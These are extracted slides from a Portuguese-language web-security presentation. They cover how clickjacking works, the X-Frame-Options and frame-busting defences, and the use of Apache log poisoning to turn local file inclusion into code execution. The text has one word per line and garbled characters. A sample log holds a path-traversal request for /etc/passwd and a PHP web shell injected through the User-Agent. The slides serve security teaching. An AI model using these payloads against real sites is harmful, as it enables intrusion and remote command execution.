7. Clickjacking – como funciona?
Como
a
víIma
vê
Como
o
atacante
vê
Como
realmente
é!!!
(opacity:
50%)
8. Clickjacking – como funciona?
Observações:
-‐ Link
“Inscrever”:
Posicionado
uIlizando
absolute
com
referência
nas
extremidades
do
browser
(le_
e
top
(x,y)).
-‐ Div
que
contém
o
iframe
com
z-‐index
10
garanIndo
que
ele
fique
no
topo
dos
outros
elementos
HTML
da
página
-‐ Opacity:
0.0
deixa
o
div
transparente.
9. Clickjacking – como proteger?
Tá.
Como
eu
evito
que
meu
site
seja
renderizado
em
um
iframe
de
um
site
malicioso?
10. Clickjacking – como proteger?
UIlizando
o
cabeçalho
X-‐Frame-‐OpIons
Ou
UIlizando
“Frame
Killer”
ou
Frame
Breaking
Scripts
Referências:
hkps://www.owasp.org/index.php/Clickjacking
hkp://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combaIng-‐clickjacking-‐with-‐x-‐frame-‐opIons.aspx
11. Clickjacking – X-Frame-Options
Opções
do
cabeçalho
HTTP
X-‐Frame-‐OpIons:
• DENY:
O
browser
não
renderiza
a
página
dentro
de
iframe
• SAMEORIGIN:
O
browser
só
irá
renderizar
páginas
no
iframe
se
for
do
mesmo
domínio.
• ALLOW-‐FROM
origin:
O
browser
só
irá
renderizar
páginas
no
iframe
se
for
da
origem
especificada
(no
wildcards,
no
mulIple
origins).
23. Local File Include
Execução de código malicioso
• Antes
vamos
ver
o
que
mais
podemos
fazer
com
o
LFI.
• Onde
é
possível
escrever/alterar/
manipular
como
um
‘usuário’
em
um
browser?
24. Local File Include
Execução de código malicioso
Exemplo:
UIlizando
access_log
do
apache
Normalmente
o
apache
loga
o
“User-‐Agent”
do
Browser
do
cliente,
essa
string
pode
ser
manipulada
para
executar
código
na
aplicação
vulnerável.
25. Local File Include
Execução de código malicioso
Abaixo
log
do
apache
com
código
malicioso
‘injetado’
192.168.56.1
-‐
-‐
[28/Feb/2012:04:18:20
-‐0300]
"GET
/?lang=..././..././..././etc/passwd%00
HTTP/1.1"
200
1612
"-‐"
"Mozilla/5.0
(Macintosh;
Intel
Mac
OS
X
10.7;
rv:10.0.2)
Gecko/
20100101
Firefox/10.0.2”
192.168.56.1
-‐
-‐
[28/Feb/2012:05:25:19
-‐0300]
"GET
/?lang=ptbr
HTTP/1.1"
200
865
"-‐"
"Mozilla/5.0
(Macintosh;
Intel
Mac
OS
X
10.7;
rv:10.0.2)
Gecko/20100101
Firefox/10.0.2”
192.168.56.1
-‐
-‐
[28/Feb/2012:05:30:28
-‐0300]
"GET
/
HTTP/1.1"
200
7346
"-‐"
"Mozilla/5.0
(Macintosh;
Intel
Mac
OS
X
10.7;
rv:10.0.2)
Gecko/20100101
Firefox/10.0.2”
192.168.56.1
-‐
-‐
[28/Feb/2012:05:31:06
-‐0300]
"GET
/?lang=ptbr
HTTP/1.1"
200
865
"-‐"
"<?php
system($_GET['cmd']);
?>"